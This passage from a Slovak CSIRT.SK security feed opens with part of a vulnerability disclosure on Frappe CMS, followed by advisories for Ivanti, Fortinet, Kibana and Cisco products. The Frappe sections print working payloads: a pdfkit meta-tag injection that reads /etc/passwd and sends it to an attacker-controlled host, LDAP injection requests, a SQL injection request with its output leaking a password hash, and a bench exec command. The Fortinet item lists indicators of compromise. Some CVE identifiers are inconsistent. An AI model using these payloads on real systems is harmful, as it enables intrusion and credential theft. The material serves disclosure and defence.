<h3 class="wp-block-heading">4.&nbsp;&nbsp;&nbsp;&nbsp; Zneužitie CVE-2025-26240 vo Frappe CMS &#8211; Autentifikované SSRF / LFI</h3>



<p>Ako sme uviedli v našom predchádzajúcom článku o zraniteľnosti pdfkit &#8211; <strong>CVE-2025-26240</strong> (<a href="https://habuon.github.io/2025/03/12/pdfkit-vulnerability-(CVE-2025-26240).html">blogový príspevok</a>) &#8211; útočník môže zneužiť metódu from_string na dosiahnutie <em>SSRF</em> alebo <em>LFI</em>. V systéme Frappe CMS musí byť útočník autentifikovaný, aby mohol zavolať <code>/api/method/frappe.utils.print_format.report_to_pdf endpoint</code>.</p>



<p>Keďže Frappe pridáva niekoľko predvolených možností, musíme ich vyfabrikovať tak, aby sme zabezpečili, že sa zobrazia pred našimi vlastnými argumentmi. Nižšie je uvedený príklad dokumentu HTML, ktorý potrebujeme odoslať na dosiahnutie <em>LFI</em> v rámci Frappe:</p>



<p><code>&lt;meta name='pdfkit-print-media-type' content=''&gt;<br>&lt;meta name='pdfkit-background' content=''&gt;<br>&lt;meta name='pdfkit-images' content=''&gt;<br>&lt;meta name='pdfkit-quiet' content=''&gt;<br>&lt;meta name='pdfkit-encoding' content=''&gt;<br>&lt;meta name='pdfkit-margin-right' content=''&gt;<br>&lt;meta name='pdfkit-margin-left' content=''&gt;<br>&lt;meta name='pdfkit-margin-top' content=''&gt;<br>&lt;meta name='pdfkit-margin-bottom' content=''&gt;<br>&lt;meta name='pdfkit-cookie-jar' content=''&gt;<br>&lt;meta name='pdfkit-page-size' content=''&gt;<br>&lt;meta name='pdfkit-quiet' content=''&gt;<br>&lt;meta name='pdfkit---disable-local-file-access' content=''&gt;<br>&lt;meta name='pdfkit---allow' content='/etc'&gt;<br>&lt;meta name='pdfkit---post-file' content=''&gt;<br>&lt;meta name='pdfkit-file--a' content='/etc/passwd'&gt;<br>&lt;meta name='pdfkit-http://172.17.0.1:8888?LFI-TEST=--' content='--cache-dir'&gt;<br>&lt;h1&gt;LFI POC&lt;/h1&gt;</code></p>



<p>V payloade, <em>http://172.17.0.1:8888</em> je útočníkom kontrolovaný server so serverom Python počúvajúcim na porte <em>8888</em>.</p>



<p>Po odoslaní HTML dostaneme obsah súboru <em>/etc/passwd</em>, presne tak, ako je to uvedené v našej analýze <strong>CVE-2025-26240 </strong>(<a href="https://habuon.github.io/2025/03/12/pdfkit-vulnerability-(CVE-2025-26240).html">blogový príspevok</a>).</p>



<p>Podobne by sme mohli dosiahnuť SSRF použitím argumentu <code>--script</code> a bezprostredne po ňom pridať <code>--disable-javascript</code> a <code>--enable-javascript</code>. Keďže autori Frappe implementovali bezpečnostné nastavenia pre zakázanie JavaScriptu pomocou <code>{"disable-javascript": "", "disable-local-file-access": ""}</code>, táto manipulácia účinne obchádza túto ochranu.</p>



<h3 class="wp-block-heading">5.&nbsp;&nbsp;&nbsp;&nbsp; Injektovanie LDAP</h3>



<p>Zraniteľnosť umožňujúca injektovanie LDAP sa nachádza v <em>ldap_settings.py</em>, konkrétne v nasledujúcich metódach:</p>



<ul>
<li><strong>reset_password</strong> (riadok 339) (iba autentifikovaný používateľ) – Používateľský vstup sa používa priamo vo vyhľadávacom filtri LDAP <code>search_filter = f"({self.ldap_email_field}={user}</code><br>
<ul>
<li>To umožňuje útočníkovi injektovať ľubovoľné vyhľadávacie filtre LDAP, čím môže získať záznamy používateľov alebo zmeniť správanie pri overovaní.<br><br><strong>Požiadavka:</strong><br><code>GET /api/method/frappe.integrations.doctype.ldap_settings.ldap_settings.reset_password?user=admin*&amp;password=test&amp;logout=0</code><br><br></li>



<li>To sa dá zneužiť aj pomocou obídenia CSRF, čím sa dosiahne neautentifikovaná zmena hesla LDAP akéhokoľvek používateľa.<br><br></li>
</ul>
</li>



<li><strong>authenticate</strong> (riadok 311)<ul><li>Pri vytváraní vyhľadávacieho filtra LDAP sa používa používateľský vstup nebezpečným spôsobom <code>user_filter = self.ldap_search_string.format(username)</code></li></ul>
<ul>
<li>To môže útočníkovi umožniť vytvoriť vstup, ktorý manipuluje s dotazom LDAP, a tak prípadne získať prístup k citlivým informáciám používateľa.<br><br><strong>Požiadavka:</strong><br><code>POST /api/method/frappe.integrations.doctype.ldap_settings.ldap_settings.login Host: localhost:8080<br>Content-Length: 54<br>X-Requested-With: XMLHttpRequest<br>Content-Type: application/json<br><br>{“usr”:“adm<em>)(|(cn=</em>)(|(sn=<em>)(|(cn=</em>)))”, “pwd”:“test”}</code><br><br></li>



<li>To sa dá zneužiť vo väčších databázach LDAP na časový útok, pretože aplikácia najprv skontroluje, či používateľ existuje, a potom sa pokúsi opätovne nadviazať spojenie s načítaným používateľom a poskytnutým heslom.</li>
</ul>
</li>
</ul>



<h3 class="wp-block-heading">6.&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;Autentifikovaná SQL injection</h3>



<p>Dopyt SQL v metóde <em>execute_query</em> je formátovaný nasledovne:</p>



<p><code>query = """select {fields}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; from {tables}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {conditions}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {group_by}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {order_by}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {limit}""".format(**args)</code></p>



<p>Pre <em>order_by</em> a <em>group_by</em> je aplikovaný podobný filter. Obchádzaný filter sa nachádza v súbore <em>frappe.model.db_query.py</em> (riadok 1114):</p>



<p><code>if "select" in _lower and "from" in _lower:</code></p>



<p>Útočník môže obísť túto kontrolu nasledujúcim nastavením:</p>



<p><code>group_by = "name UNION SELECT '"<br>order_by = "',null,...,null,name,password FROM __Auth"</code></p>



<p>To vedie k dopytu, ktorý extrahuje používateľské meno a hash hesla z tabuľky <em>__Auth</em>.</p>



<p>Odoslaním nasledujúcej požiadavky:</p>



<p><code>GET /api/method/frappe.desk.reportview.export_query?ignore_permissions=True&amp;doctype=Notification+Settings&amp;fields=*&amp;file_format_type=CSV&amp;group_by=name+UNION+SELECT+'&amp;order_by=',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,name,password+FROM+__Auth HTTP/1.1<br>Host: localhost:8080<br>Cookie: system_user=no; user_image=; sid=1a04399debb6cfc1d63eb5f52d12fb03b03b8c2167e63a953f6d4404; full_name=jdoe%40example.org; user_id=jdoe%40example.org</code></p>



<p>Získame:</p>



<p><code>HTTP/1.1 200 OK<br>Content-Disposition: filename="Notification Settings.csv"<br>...<br>"admin@admin.admin","$pbkdf2-sha256$29000$SGnNOcc4Z.xdK6W0VsoZAw$4DtTeEuaTiqMbuNxjQW.DYWsrIy25qJuTvFWB5/ANnc"</code></p>



<p>To potvrdzuje, že autentizovaný útočník môže získať hash hesla z tabuľky <em>__Auth</em>, čo umožňuje offline útoky hrubou silou. Tabuľku <em>Notification Settings</em> sme použili preto, že sa zdá, že všetci používatelia majú pre ňu predvolene práva na export, rovnako ako napríklad pre tabuľku <em>Tag</em> a ďalšie.</p>



<h3 class="wp-block-heading">7.&nbsp;&nbsp;&nbsp;&nbsp; Vykonávanie kódu</h3>



<p>Posledná zraniteľnosť, o ktorej budeme diskutovať, nie je taká závažná, avšak môže viesť k zaujímavému zvýšeniu oprávnení v prípade, že sú kompromitovaným účtom nesprávne nastavené práva <em>sudo</em>.</p>



<p>Frappe používa príkazový riadok <em>bench</em>. Zároveň implementuje niekoľko vlastných príkazov, z ktorých jeden je <em>run-patch</em>. <em>Run-patch</em> má nedokumentovanú funkciu, ktorá umožňuje používateľovi spustiť kód Pythonu v jednoduchej funkcii Python <em>exec</em> bez akéhokoľvek sandboxu alebo obmedzení. Keď používateľ spustí príkaz <code>bench run-patch 'execute:import os;os.system("touch /tmp/test.txt")'</code>, vytvorí sa súbor test.txt, ktorý ukazuje, že systémový príkaz bol úspešne vykonaný.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="105" src="/wp-content/uploads/2025/05/Frappe02-1024x105.png" alt="" class="wp-image-2372"/></figure>



<p>To sa dá zneužiť napríklad na zvýšenie oprávnení v prípade, že kompromitované používateľské konto má práva <em>sudo</em> na spustenie <code>bench run-patch *</code>. Rovnaký prípad môže nastať aj keď existuje vlastná administrátorská stránka na aplikovanie záplat, ktorú možno zneužiť pomocou už spomínaného SSRF.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2370/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – apríl 2025</title>
		<link>/posts/2363</link>
					<comments>/posts/2363#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 15 May 2025 13:11:57 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2363</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/05/MS202504.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 04/2025 PDF (1 523 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2363/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané zraniteľnosti v produktoch Ivanti EPMM a Neurons for ITSM</title>
		<link>/posts/2361</link>
					<comments>/posts/2361#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:35:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2361</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre kritickú zraniteľnosť produktu Neurons for ITSM a&#160;dve aktívne zneužívané zraniteľnosti v Endpoint Manager Mobile...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre kritickú zraniteľnosť produktu Neurons for ITSM a&nbsp;dve aktívne zneužívané zraniteľnosti v Endpoint Manager Mobile (EPMM). Zraniteľnosti s&nbsp;identifikátormi CVE-2025-22462, CVE-2025-4427 a CVE-2025-4427 možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom, vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Neurons for ITSM 2023.4 bez aplikovanej záplaty May 2025 Security Patch</li>



<li>Ivanti Neurons for ITSM 2024.3 bez aplikovanej záplaty May 2025 Security Patch</li>



<li>Ivanti Neurons for ITSM 2024.2 bez aplikovanej záplaty May 2025 Security Patch</li>



<li>Ivanti Endpoint Manager Mobile 11.12.0.X vo verziách starších ako 11.12.0.5</li>



<li>Ivanti Endpoint Manager Mobile 12.3.0.X vo verziách starších ako 12.3.0.2</li>



<li>Ivanti Endpoint Manager Mobile 12.4.0.X vo verziách starších ako 12.4.0.2</li>



<li>Ivanti Endpoint Manager Mobile 12.5.0.X vo verziách starších ako 12.5.0.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Ivanti Neurons for ITSM</u></strong></p>



<p><strong>CVE-2025-22462 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>získanie administrátorského prístupu do systému</strong>.</p>



<p><strong><u>Ivanti Endpoint Manager Mobile</u></strong></p>



<p><strong>CVE-2025-4427&nbsp; </strong>(CVSS skóre 5,3)</p>



<p>Zraniteľnosť možno zaslaním špeciálne vytvorených API požiadaviek zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>CVE-2025-4428 </strong>(CVSS skóre 7,2)</p>



<p>CVE-2025-4428 by vzdialený autentifikovaný útočník zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Pozn.: Zreťazením zraniteľností EPMM možno získať schopnosť vzdialene vykonávať kód bez autentifikácie. Zraniteľnosti sú v&nbsp;súčasnosti aktívne zneužívané na prienik do systémov.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong><strong></strong></li>



<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom lokálne nasadených inštancií Ivanti Neurons for ITSM odporúčame bezodkladnú inštaláciu bezpečnostných záplat May 2025 Security Patch pre verzie 2023.4, 2024.2 a 2024.3 a dodržiavanie <a href="https://help.ivanti.com/ht/help/en_US/ISM/2024/ITSM-On-Prem-Help/Content/ConfigDB_Guide/Securing-IIS-Website.htm">odporúčaného postupu pre zabezpečenie webových stránok IIS</a> a&nbsp;<a href="https://help.ivanti.com/ht/help/en_US/ISM/2024/ITSM-On-Prem-Help/Content/Install_Deploy_guide/Deployment_Enter_Prod_Secure.htm">prevádzkovanie produktu v&nbsp;rámci DMZ</a>.</p>



<p>Administrátorom lokálne nasadených inštancií Ivanti EPMM odporúčame bezodkladnú aktualizáciu na verzie 11.12.0.5, 12.3.0.2, 12.4.0.2 alebo 12.5.0.1. Vzhľadom na to, že zneužitie oboch zraniteľností spočíva v&nbsp;zaslaní špeciálne vytvorených API požiadaviek, zraniteľnosti možno mitigovať limitovaním prístupu k&nbsp;API rozhraniu APMM. Výrobca odporúča prístup limitovať prostredníctvom <a href="https://help.ivanti.com/mi/help/en_us/core/12.x/sys/CoreSystemManager/Access_Control_Lists__Po.htm">ACL (Access Control List) funkcionality produktu</a> alebo prostredníctvom externého WAF (Web Application Firewall). <a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US">Kompletný návod</a> môžete nájsť na stránke výrobcu, v&nbsp;časti Mitigation or Workaround.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-on-premises-only-CVE-2025-22462?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-on-premises-only-CVE-2025-22462?language=en_US</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ivanti-warns-of-critical-neurons-for-itsm-auth-bypass-flaw/">https://www.bleepingcomputer.com/news/security/ivanti-warns-of-critical-neurons-for-itsm-auth-bypass-flaw/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ivanti-fixes-epmm-zero-days-chained-in-code-execution-attacks/">https://www.bleepingcomputer.com/news/security/ivanti-fixes-epmm-zero-days-chained-in-code-execution-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2361/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zero-day zraniteľnosť v produktoch Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder a FortiCamera</title>
		<link>/posts/2359</link>
					<comments>/posts/2359#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:33:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2359</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť v produktoch FortiVoice, FortiMail, FortiNDR, FortiRecorder a FortiCamera. CVE-2023-32756 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť v produktoch FortiVoice, FortiMail, FortiNDR, FortiRecorder a FortiCamera. CVE-2023-32756 možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom. Zraniteľnosť je aktívne zneužívaná v&nbsp;rámci útokov na telefónne systémy FortiVoice.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiCamera 2.1 vo verziách starších ako 2.1.4</li>



<li>FortiCamera 2.0 vo všetkých verziách</li>



<li>FortiCamera 1.1 vo všetkých verziách</li>



<li>FortiMail 7.6 vo verziách starších ako 7.6.3</li>



<li>FortiMail 7.4 vo verziách starších ako 7.4.5</li>



<li>FortiMail 7.2 vo verziách starších ako 7.2.8</li>



<li>FortiMail 7.0 vo verziách starších ako 7.0.9</li>



<li>FortiNDR 7.6 vo verziách starších ako 7.6.1</li>



<li>FortiNDR 7.4 vo verziách starších ako 7.4.8</li>



<li>FortiNDR 7.2 vo verziách starších ako 7.2.5</li>



<li>FortiNDR 7.1 vo všetkých verziách</li>



<li>FortiNDR 7.0 vo verziách starších ako 7.0.7</li>



<li>FortiNDR 1.5 vo všetkých verziách</li>



<li>FortiNDR 1.4 vo všetkých verziách</li>



<li>FortiNDR 1.3 vo všetkých verziách</li>



<li>FortiNDR 1.2 vo všetkých verziách</li>



<li>FortiNDR 1.1 vo všetkých verziách</li>



<li>FortiRecorder 7.2 vo verziách starších ako 7.2.4</li>



<li>FortiRecorder 7.0 vo verziách starších ako 7.0.6</li>



<li>FortiRecorder 6.4 vo verziách starších ako 6.4.6</li>



<li>FortiVoice 7.2 vo verziách starších ako 7.2.1</li>



<li>FortiVoice 7.0 vo verziách starších ako 7.0.7</li>



<li>FortiVoice 6.4 vo verziách starších ako 6.4.11</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32756 </strong>(CVSS 3.1 skóre: 9,6)</p>



<p>Kritická zraniteľnosť spočíva v pretečení vyrovnávacej pamäte zásobníka a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pozn.: Zraniteľnosť je aktívne zneužívaná v rámci útokov na telefónne systémy FortiVoice. Útočníci po prieniku do systému vykonávajú skenovanie siete, mažú systémové crashlogy a&nbsp;aktivujú funkciu fcgi debugging za účelom zaznamenávania prihlasovacích údajov zo systému a&nbsp;prihlasovania prostredníctvom SSH.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len produkty s&nbsp;platnou technickou podporou. Administrátorom odporúčame <strong>bezodkladnú aktualizáciu</strong> FortiCamera&nbsp; aspoň na verziu 2.1.4; FortiMail na verzie 7.6.3, 7.4.5, 7.2.8 alebo 7.0.9; FortiNDR na verzie 7.6.1, 7.4.8, 7.2.5 alebo 7.0.7; FortiRecorder na verzie 7.2.4, 7.0.6 alebo 6.4.6 a&nbsp;FortiVoice na verzie 7.2.1, 7.0.7 alebo 6.4.11. V&nbsp;prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prístupu k&nbsp;administratívnemu rozhraniu zariadení alebo úplným vypnutím HTTP/HTTPS prístupu k&nbsp;nim.</p>



<p><strong>Taktiež odporúčame vykonať kontrolu logov a&nbsp;nastavení za účelom identifikácie pokusov o&nbsp;zneužitie tejto zraniteľnosti a&nbsp;preverenie IOC v&nbsp;rámci logov sieťových a&nbsp;bezpečnostných prvkov.</strong></p>



<ul>
<li>V rámci <strong>kontroly logov prostredníctvom CLI príkazu „diagnose debug application httpd display trace-log“</strong> indikuje zneužitie zraniteľnosti prítomnosť riadkov v tvare:<ul><li>[x x x x:x:x.x 2025] [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection</li></ul>
<ul>
<li>[x x x x:x:x.x 2025] [fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11</li>
</ul>
</li>



<li><strong>Preveriť stav funkcie fcgi debugging prostredníctvom CLI príkazu „diag debug application fcgi“</strong>. Ak je funkcia na zariadení aktívna, výpis obsahuje reťazec „general to-file ENABLED“. Nakoľko uvedená funkcia nie je v&nbsp;predvolenom nastavení aktívna, ak ste ju neaktivovali manuálne, indikuje aktivitu útočníka.</li>



<li>Vykonať <strong>kontrolu integrity súborového systému zariadenia </strong>za účelom identifikácie <strong>súborov nahraných útočníkom</strong><ul><li>/bin/wpad_ac_helper<ul><li>MD5:4410352e110f82eabc0bf160bec41d21</li></ul></li></ul><ul><li>/bin/busybox<ul><li>MD5:ebce43017d2cb316ea45e08374de7315</li></ul><ul><li>MD5: 489821c38f429a21e1ea821f8460e590</li></ul></li></ul><ul><li>/lib/libfmlogin.so<ul><li>MD5:364929c45703a84347064e2d5de45bcd</li></ul></li></ul><ul><li>/bin/fmtest<ul><li>MD5: 2c8834a52faee8d87cff7cd09c4fb946</li></ul></li></ul><ul><li>/var/spool/.sync</li></ul>
<ul>
<li>/tmp/.sshdpm</li>
</ul>
</li>



<li>Vykonať <strong>kontrolu integrity súborového systému zariadenia </strong>za účelom identifikácie <strong>modifikácie nastavení:</strong><ul><li>/data/etc/crontab</li></ul><ul><li>/var/spool/cron/crontabs/root</li></ul><ul><li>/etc/pam.d/sshd</li></ul>
<ul>
<li>/etc/httpd.conf</li>
</ul>
</li>
</ul>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>43.228.217[.]82</li>



<li>43.228.217[.]173</li>



<li>156.236.76[.]90</li>



<li>198.105.127[.]124</li>



<li>218.187.69[.]244</li>



<li>218.187.69[.]59</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-254">https://fortiguard.fortinet.com/psirt/FG-IR-25-254</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-zero-day-exploited-in-fortivoice-attacks/">https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-zero-day-exploited-in-fortivoice-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2359/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť vo vizualizačnej platforme Kibana</title>
		<link>/posts/2356</link>
					<comments>/posts/2356#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:31:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Elastic]]></category>
		<category><![CDATA[Kibana]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2356</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/kibana.png" alt="" /></p>Spoločnosť Elastic vydala bezpečnostné aktualizácie svojej vizualizačnej platformy Kibana, ktoré opravujú kritickú zraniteľnosť. CVE-2025-25014 by vzdialený autentifikovaný útočník mohol zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/kibana.png" alt="" /></p>
<p><strong>Spoločnosť Elastic vydala bezpečnostné aktualizácie svojej vizualizačnej platformy Kibana, ktoré opravujú kritickú zraniteľnosť. CVE-2025-25014 by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Elastic Kibana vo verziách 8.3.0 až 8.17.5</li>



<li>Elastic Kibana vo verzii 8.18.0</li>



<li>Elastic Kibana vo verzii 9.0.0</li>
</ul>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách, na ktorých sú súčasne aktívne funkcie Machine Learning a&nbsp;Reporting.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-25014 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,1)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nedostatočnej kontrole neoprávnenej manipulácie s&nbsp;atribútmi prototypov objektov. Vzdialený autentifikovaný útočník by ju mohol zneužiť na<strong> vykonanie ľubovoľného kódu</strong> zaslaním špeciálne vytvorených HTTP požiadaviek na koncové body Machine Learning a Reporting.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie ľubovoľného kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu Elastic Kibana na verzie 8.17.6, 8.18.1 alebo 9.0.1. V&nbsp;prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno dočasne mitigovať aj deaktiváciou minimálne jednej z&nbsp;funkcií Machine Learning alebo Reporting.</p>



<p>Funkciu <strong>Machine Learning</strong> možno na lokálnych aj cloudových inštanciách deaktivovať pridaním <strong>xpack.ml.enabled: false</strong> do konfiguračného súboru <strong>elasticsearch.yml</strong>. Na lokálnych inštanciách je funkciu možno deaktivovať aj pridaním <strong>xpack.ml.ad.enabled: false</strong> do <strong>kibana.yml</strong>.</p>



<p>Funkciu <strong>Reporting</strong> možno na lokálnych aj cloudových inštanciách deaktivovať pridaním <strong>xpack.reporting.enabled: false</strong> do konfiguračného súboru <strong>kibana.yml</strong>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://discuss.elastic.co/t/kibana-8-17-6-8-18-1-or-9-0-1-security-update-esa-2025-07/377868">https://discuss.elastic.co/t/kibana-8-17-6-8-18-1-or-9-0-1-security-update-esa-2025-07/377868</a></li>



<li><a href="https://ccb.belgium.be/advisories/warning-critical-prototype-pollution-elastic-kibana-can-lead-rce-patch-immediately">https://ccb.belgium.be/advisories/warning-critical-prototype-pollution-elastic-kibana-can-lead-rce-patch-immediately</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2356/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v bezdrôtových kontroléroch Cisco</title>
		<link>/posts/2354</link>
					<comments>/posts/2354#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:29:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2354</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoje bezdrôtové kontroléry s&#160;operačným systémom Cisco IOS XE, ktoré opravujú kritickú zraniteľnosť. CVE-2025-20188 by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
